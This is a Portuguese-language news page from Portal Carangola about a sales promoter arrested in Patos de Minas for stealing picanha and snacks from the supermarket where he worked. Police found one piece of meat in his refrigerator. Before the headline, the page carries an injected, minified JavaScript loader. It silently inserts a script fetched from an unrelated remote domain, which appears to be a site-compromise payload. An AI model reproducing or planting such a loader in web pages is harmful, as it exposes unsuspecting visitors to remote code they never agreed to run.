;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Promotor de vendas furta picanha de supermercado e acaba preso em Minas Circuito de segurança registrou o furto e imagens foram cedidas para a PM de Patos de Minas. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Promotor de vendas furta picanha de supermercado e acaba preso em Minas Circuito de segurança registrou o furto e imagens foram cedidas para a PM de Patos de Minas.

Um promotor de vendas de um supermercado foi preso suspeito de furtar picanha do local de trabalho em Patos de Minas, na região do Alto Paranaíba, nesta quinta-feira (5). Câmeras de segurança registraram a ação criminosa e a carne foi encontrada na geladeira da casa do rapaz de 25 anos.

De acordo com a Polícia Militar (PM), o fiscal de perdas notou a ausência de duas peças de picanha e procurou uma funcionária. A colega de trabalho buscou as gravações do circuito de segurança e viu o momento em que o promotor colocou as peças de carne em um carrinho.

As imagens ainda mostraram o rapaz pegando chocolate e biscoito, no entanto, não foi possível constatar a quantidade e quais as marcas dos produtos. O promotor de vendas não passou no caixa e foi flagrado colocando os produtos na mochila e deixando o estabelecimento comercial.

Os dados do suspeito foram repassados para a PM que foi até a casa do colaborador do supermercado. A mãe do promotor recebeu os militares e autorizou a entrada no imóvel. O rapaz mostrou a peça de picanha dentro da geladeira e ao ser indagado sobre onde estava a segunda peça, acabou dizendo que não sabia.

O suspeito foi preso em flagrante e encaminhado para a Delegacia de Plantão de Patos de Minas.

Fonte:O Tempo

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.